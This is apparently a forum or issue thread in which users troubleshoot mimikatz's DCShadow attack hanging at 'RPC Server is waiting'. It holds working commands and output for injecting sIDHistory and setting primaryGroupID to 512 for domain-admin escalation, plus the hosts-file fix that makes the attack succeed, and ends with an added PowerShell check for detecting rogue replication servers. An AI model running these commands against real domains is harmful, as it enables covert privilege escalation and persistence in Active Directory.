mimikatz
dcshadow ..rpc server is waiting
Hello, actually I found this issue when running dcshadow against a Windows 2008 R2 domain controller, using the latest version of the program:
mimikatz # version /full
mimikatz 2.2.0 (arch x64) Windows NT 10.0 build 18898 (arch x64) msvc 191627034 0
lsasrv.dll : 10.0.18898.1000
msv1_0.dll : 10.0.18898.1000
tspkg.dll : 10.0.18898.1000
wdigest.dll : 10.0.18898.1000
kerberos.dll : 10.0.18898.1000
dpapisrv.dll : 10.0.18898.1000
cryptdll.dll : 10.0.18898.1000
samsrv.dll : 10.0.18898.1000
rsaenh.dll : 10.0.18898.1000
ncrypt.dll : 10.0.18898.1000
ncryptprov.dll : 10.0.18898.1000
wevtsvc.dll : 10.0.18898.1000
termsrv.dll : 10.0.18898.1000
I run one mimikatz as the SYSTEM account (process::runp), where I set the change I want to apply:
mimikatz # lsadump::dcshadow /object:xxxxx /attribute:sIDHistory /value:S-1-5-21-123455464-12314568901-3331114691-20803
** Domain Info **
Domain: DC=test,DC=local
Configuration: CN=Configuration,DC=test,DC=local
Schema: CN=Schema,CN=Configuration,DC=test,DC=local
dsServiceName: ,CN=Servers,CN=Monza,CN=Sites,CN=Configuration,DC=test,DC=local
domainControllerFunctionality: 4 ( WIN2008R2 )
highestCommittedUSN: 12758710
** Server Info **
Server: DHCP01.test.local
InstanceId : {59e08b06-0af3-49c2-a0f8-9ff1158e4205}
InvocationId: {2caf9b84-a3ac-4508-94da-9f08fd661ba9}
Fake Server (not already registered): BIT02404.test.local
** Attributes checking **
#0: sIDHistory
** Objects **
#0: l.grembo DN:CN=xxxxx,OU=Tecnici,OU=Monza,DC=test,DC=local sIDHistory (1.2.840.113556.1.4.609-90261 rev 1): S-1-5-21-3039643774-2920745930-236334691-20803 (0105000000000005150000007e482db5ca0b17ae632e160e43510000)
** Starting server **
BindString[0]: ncacn_ip_tcp:BIT02404[63259]
RPC bind registered
RPC Server is waiting!
== Press Control+C to stop ==
Then, with a domain admin account, I use mimikatz and do:
mimikatz # lsadump::dcshadow /push /dc:dhcp01.test.local
** Domain Info **
Domain: DC=test,DC=local
Configuration: CN=Configuration,DC=test,DC=local
Schema: CN=Schema,CN=Configuration,DC=test,DC=local
dsServiceName: ,CN=Servers,CN=Monza,CN=Sites,CN=Configuration,DC=test,DC=local
domainControllerFunctionality: 4 ( WIN2008R2 )
highestCommittedUSN: 12758718
** Server Info **
Server: dhcp01.test.local
InstanceId : {59e08b06-0af3-49c2-a0f8-9ff1158e4205}
InvocationId: {2caf9b84-a3ac-4508-94da-9f08fd661ba9}
Fake Server (not already registered): BIT02404.test.local
** Performing Registration **
** Performing Push **
Syncing DC=test,DC=local Sync Done
** Performing Unregistration **
The problem is that in the mimikatz running as the SYSTEM account I don't see the replication ending well; I keep seeing this:
** Starting server **
BindString[0]: ncacn_ip_tcp:BIT02404[63259]
RPC bind registered
RPC Server is waiting!
== Press Control+C to stop ==
Basically it waits forever until I press Control+C.
I have checked on both the server and the workstation that RPC traffic is allowed; even with no firewall enabled I keep seeing "RPC Server is waiting".
Any ideas why that happens? I never had problems pushing attributes with dcshadow, but this time
Appreciated, thanks.
Hello, this should be a firewall problem; there is no open RPC port. You can try turning off the firewall!
Hello, thanks for the reply. Sadly, I have disabled the Windows firewall on both sides, DC and client, but I am still getting the same issue: RPC is hanging until I press Ctrl+C.
I got the same issue with Defender disabled and the firewall off on both PC and DC. Win10 and WS2016.
I encountered the same problem with Defender disabled and the firewalls of both PC and DC turned off. Win10 and WS2016.
You can try turning off the firewalls of the DC and the domain host. Then, on a normal domain control host (you don't need to log in with the domain account), you need two command-line windows with different permissions: local SYSTEM permission (A) and domain administrator permission (B). Execute the DCShadow command in A and push from B.
A window:
mimikatz # token::whoami
Process Token : {0;000003e7} 1 D 1390653 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary
Thread Token : no token
B window:
mimikatz # token::whoami
Process Token : {0;004a5b1f} 1 L 4951318 TONY\attack S-1-5-21-..... (14g,05p) Primary
Thread Token : no token
This is what I want to execute (add test to admin):
A window:
mimikatz # lsadump::dcshadow /object:CN=dc,CN=Users,DC=tony,DC=local /attribute:primarygroupid /value:512
B window:
mimikatz # lsadump::dcshadow /push
Thank you very much for reply.
I did that...
Disabled the firewall on both PC and DC.
"netsh advfirewall show allprofiles" shows OFF on every profile on both sides (PC and DC).
Logged on to the PC with a domain user, then ran cmd as domain admin and ran...
A Window with Domain Admin
psexec -i -s cmd (whoami returns "nt authority\system")
Run mimikatz in that window:
token::whoami returns NT AUTHORITY\SYSTEM
lsadump::dcshadow /object:CN=Administrator,CN=Users,DC=root,DC=domain /Attribute:description /Value:Hello. (with no error)
B Window with Domain Admin
Run mimikatz in a new cmd with Domain Admin privileges:
token::whoami returns domain\domain user
lsadump::dcshadow /push (with no error)
But A was still waiting...
I tried "!process token" in the A window, but it still doesn't work.
Any hints welcome...
Finally I got it. Just installed the English version on both PC and WS. Works like a charm.
@zerocool225 how did you do it? I am facing the same problem and can't solve it!
@zerocool225 Same problem here, how did you manage to solve it? The firewall is turned off on all stations.
@johnjohnsp1 I met the same problem. Finally I found out that the DC (in your situation DHCP01.test.local) can't resolve the fake server name (BIT02404.test.local). So I added the fake server name resolution to the DC's hosts file, and then the dcshadow attack succeeded. Hope this can help you.
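From the defender's side, the output in this thread shows what a push leaves behind to look for: a "Fake Server" such as BIT02404.test.local is registered under CN=Sites in the Configuration partition, replicates, and is unregistered again. The following check is an added example (not code from this thread or from mimikatz) that enumerates every replication endpoint (nTDSDSA object) registered there and flags any whose server object is not a known domain controller or whose DNS name does not resolve; it assumes the ActiveDirectory RSAT module and read access to the Configuration naming context.

```powershell
# Added example, not from the thread. Lists every nTDSDSA object (replication endpoint)
# under CN=Sites in the Configuration partition and flags registrations that are not a
# known domain controller or whose DNS name does not resolve, the trace a DCShadow push
# leaves while its fake server is registered.
# Assumes: ActiveDirectory module installed, rights to read the Configuration NC.
Import-Module ActiveDirectory

$configNC = (Get-ADRootDSE).configurationNamingContext

# Known DCs of the current domain. In a multi-domain forest, collect this list from every
# domain ((Get-ADForest).Domains), since the Configuration partition is forest-wide.
$knownDCs = (Get-ADDomainController -Filter *).HostName | ForEach-Object { $_.ToLower() }

$findings = foreach ($ntds in (Get-ADObject -LDAPFilter '(objectClass=nTDSDSA)' `
                                            -SearchBase "CN=Sites,$configNC")) {
    # The nTDSDSA object is "CN=NTDS Settings,<server DN>"; drop the first RDN.
    $serverDN = ($ntds.DistinguishedName -split ',', 2)[1]
    $server   = Get-ADObject -Identity $serverDN -Properties dNSHostName
    $dnsName  = if ($server.dNSHostName) { $server.dNSHostName.ToLower() } else { $null }

    # A server object that the DC itself cannot resolve is exactly what the thread hit.
    $resolves = $false
    if ($dnsName) {
        try { [System.Net.Dns]::GetHostEntry($dnsName) | Out-Null; $resolves = $true } catch {}
    }

    [pscustomobject]@{
        ServerDN    = $serverDN
        DnsHostName = $dnsName
        KnownDC     = [bool]($dnsName -and ($knownDCs -contains $dnsName))
        Resolves    = $resolves
    }
}

# Anything outside the DC list, or with no resolvable name, is a candidate rogue registration.
$findings | Where-Object { -not $_.KnownDC -or -not $_.Resolves } | Format-Table -AutoSize
```

Because the thread's output shows the fake server being unregistered right after the push, a one-off run can miss it; schedule the check or trigger it from directory object-creation auditing on the Sites container.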